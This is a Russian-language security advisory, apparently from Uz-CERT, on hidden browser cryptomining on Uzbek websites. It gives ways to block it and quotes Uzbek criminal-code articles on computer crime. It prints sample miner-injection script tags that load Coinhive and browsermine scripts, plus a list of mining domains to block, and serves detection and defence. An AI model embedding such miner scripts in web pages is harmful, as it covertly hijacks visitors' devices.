Информация размещается ввиду участившегося числа обращений в адрес Uz-CERT о веб-сайтах доменной зоны "UZ", на которых запущен скрытый "браузерный майнинг"
Информация о защите персональных компьютеров
от неправомерного использования в работе глобальных вычислительных сетей по подтверждению транзакций
в блокчейне (майнинге)
Принцип «браузерного майнинга» основан на внедрении в файлы веб-сайта (веб-хостинга) javascript-сценариев или сценариев на других языках ООП, направленных на использование сетевых и иных ресурсов пользовательских рабочих станций (компьютеров, мобильных устройств
и т.д.) для работы в глобальных вычислительных сетях для расчета хеш-сумм и кодов и последующих блокчейн-транзакций. Более подробная информация о браузерном майнинге доступна в глобальной сети Интернет.
Нами проведено изучение ряда веб-сайтов доменной зоны "UZ" (названия не приводятся), у которых в исходном коде страниц обнаружены доказательства размещения скриптов-майнеров:
ПРИМЕР 1
<script async="async" src="//browsermine.com/browsermine.js?u=759562&p=50"></script>
ПРИМЕР 2
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
ПРИМЕР 3
<script>
var miner = new CoinHive.Anonymous ('AOwNYbVwSP8KKOPwDsJaqVbNeAmORbsi');
miner.start ();
</script>
Эти примеры могут быть использованы пользователями для самостоятельного выявления подобных веб-майнеров на веб-сайтах, которые они посещают
Ниже представлена информация о веб-сайтах, известных наличием
в файлах веб-хостинга средств для майнинга:
- azvjudwr.info
- cnhv.co
- coin-hive.com
- gus.host
- jroqvbvw.info
- jsecoin.com
- jyhfuqoh.info
- kdowqlpt.info
- listat.biz
- lmodr.biz
- mataharirama.xyz
- minecrunch.co
- minemytraffic.com
- miner.pr0gramm.com
- reasedoper.pw
- xbasfbno.info
(информация актуальная на состояние 2017 года, полный список доменных имен, использующих «майнер»-скрипты, установить
не представляется возможным)
Для защиты компьютеров от угроз несанкционированного использования ресурсов в глобальных вычислительных сетях
по подтверждению транзакций в блокчейне (майнинге) необходимо:
Вариант 1
Редактирование файла «hosts». Необходимо добавить домены майнинга в файл "hosts". Для наглядности, приводится пример добавления доменного имени «coin-hive.com».
- 1. Откройте проводник или другой файловый менеджер и перейдите в папку: C: \ Windows \ System32 \ drivers \ etc
- 2. Откройте файл hosts в текстовом редакторе, например «Блокнот». Добавьте строку 0.0.0.0 coin-hive.com в конец документа.
- 3. Сохраните документ.
Эта процедура блокирует запросы на домен «coin-hive.com»
Вариант 2
Блокировка браузерного майнинга с помощью
«Anti-WebMiner»
Вариант 3
Защита с помощью отключения JavaScript. Необходимо отключить выполнение «javascript»-скриптов на веб-сайтах. Это может быть проблематично, так как сайтам для правильной работы может потребоваться загрузка некоторых «javascript»-скриптов (отображение информеров, динамический контент и др.).
Вариант 4
Защита от майнинга с помощью дополнений «NoCoin», «MinerBlock», «AdBlock» и «UBlock». Необходимые ссылки доступны
в глобальной сети Интернет.
Важно!!! Информация о возможности уголовного преследования за правонарушения в области информационных технологий
Уголовным кодексом Республики Узбекистан предусмотрена следующая ответственность за правонарушения в области информационных технологий
Статья 278-1. Нарушение правил информатизации
Нарушение правил информатизации, то есть создание, внедрение и эксплуатация информационных систем, баз и банков данных, систем обработки и передачи информации, санкционированный доступ в информационные системы без принятия установленных мер защиты, причинившее крупный ущерб либо существенный вред правам или охраняемым законом интересам граждан либо государственным или общественным интересам, -
наказывается штрафом до пятидесяти минимальных размеров заработной платы или исправительными работами до одного года.
Те же действия, совершенные с причинением особо крупного ущерба, -
наказываются штрафом от пятидесяти до ста минимальных размеров заработной платы или исправительными работами от одного года до двух лет либо арестом до шести месяцев.
Статья 278-2. Незаконный (несанкционированный) доступ к компьютерной информации
Незаконный (несанкционированный) доступ к компьютерной информации, то есть информации в информационно-вычислительных системах, сетях и их составных частях, если это действие повлекло уничтожение, блокирование, модификацию, копирование либо перехват информации, нарушение работы электронно-вычислительных машин, системы электронно-вычислительных машин или их сети, -
наказывается штрафом до ста минимальных размеров заработной платы или лишением определенного права до трех лет либо исправительными работами до одного года.
...
Статья 278-3. Изготовление с целью сбыта либо сбыт и распространение специальных средств для получения незаконного (несанкционированного) доступа к компьютерной системе
Изготовление с целью сбыта либо сбыт и распространение специальных программных или аппаратных средств для получения незаконного (несанкционированного) доступа к защищенной компьютерной системе -
наказывается штрафом до двухсот минимальных размеров заработной платы или исправительными работами до одного года.
Статья 278-4. Модификация компьютерной информации
Модификация компьютерной информации, то есть незаконное изменение, повреждение, стирание информации, хранящейся в компьютерной системе, а равно внесение в нее заведомо ложной информации, причинившее крупный ущерб либо существенный вред правам или охраняемым законом интересам граждан либо государственным или общественным интересам, -
наказывается штрафом до ста минимальных размеров заработной платы или исправительными работами до одного года или ограничением свободы до двух лет либо лишением свободы до двух лет.
...
Статья 278-5. Компьютерный саботаж
Умышленный вывод из строя чужого или служебного компьютерного оборудования, а равно разрушение компьютерной системы (компьютерный саботаж) -
наказывается штрафом от трехсот до четырехсот минимальных размеров заработной платы с лишением определенного права до трех лет или ограничением свободы до двух лет либо лишением свободы до двух лет.
...
Статья 278-6. Создание, использование или распространение вредоносных программ
Создание компьютерных программ или внесение изменений в существующие программы с целью несанкционированного уничтожения, блокирования, модификации, копирования или перехвата информации, хранящейся или передаваемой в компьютерной системе, а равно разработка специальных вирусных программ, их умышленное использование или распространение -
наказывается штрафом от ста до трехсот минимальных размеров заработной платы или ограничением свободы до двух лет либо лишением свободы до двух лет.
...